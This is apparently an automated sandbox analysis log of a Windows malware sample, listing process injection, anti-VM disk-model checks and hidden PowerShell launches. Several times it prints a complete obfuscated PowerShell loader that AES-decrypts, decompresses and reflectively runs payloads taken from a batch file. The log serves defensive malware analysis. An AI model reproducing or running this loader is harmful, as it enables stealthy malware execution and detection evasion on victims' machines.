Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2512A6B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BEB0A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253DFF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\users\user\desktop\x.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach ($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach ($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\users\user\desktop\x.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach ($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aqluy($yrekm){ $fiugl=[system.security.cryptography.aes]::create(); $fiugl.mode=[system.security.cryptography.ciphermode]::cbc; $fiugl.padding=[system.security.cryptography.paddingmode]::pkcs7; $fiugl.key=[system.convert]::frombase64string('yeb/naccgrtp64ttdevgddugi9xngfjfk2ndolygp24='); $fiugl.iv=[system.convert]::frombase64string('lhlil9mpoahirlkyn9z7va=='); $exyah=$fiugl.createdecryptor(); $ygvoo=$exyah.transformfinalblock($yrekm, 0, $yrekm.length); $exyah.dispose(); $fiugl.dispose(); $ygvoo;}function mfhoz($yrekm){ invoke-expression '$hdetz=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$yrekm);'.replace('*', ''); invoke-expression '$wkyjd=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$odkut=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($hdetz, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $odkut.copyto($wkyjd); $odkut.dispose(); $hdetz.dispose(); $wkyjd.dispose(); $wkyjd.toarray();}function tnqry($yrekm,$vdcuy){ invoke-expression '$kying=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$yrekm);'.replace('*', ''); invoke-expression '$tcvqt=$kying.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$tcvqt.*i*n*v*o*k*e*($null, $vdcuy);'.replace('*', '');}$yfdgp = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $yfdgp;$blpnl=[system.io.file]::readalltext($yfdgp).split([environment]::newline);foreach ($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,8_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,8_2_0000000140002300
Source: dwm.exe, 0000000E.00000002.2282495409.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000E.00000000.2018886592.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
Source: C:\Windows\System32\winlogon.exeCode function: 9_3_00000225DC622AF0 cpuid 9_3_00000225DC622AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-SgIauazY VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-SgIauazY VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
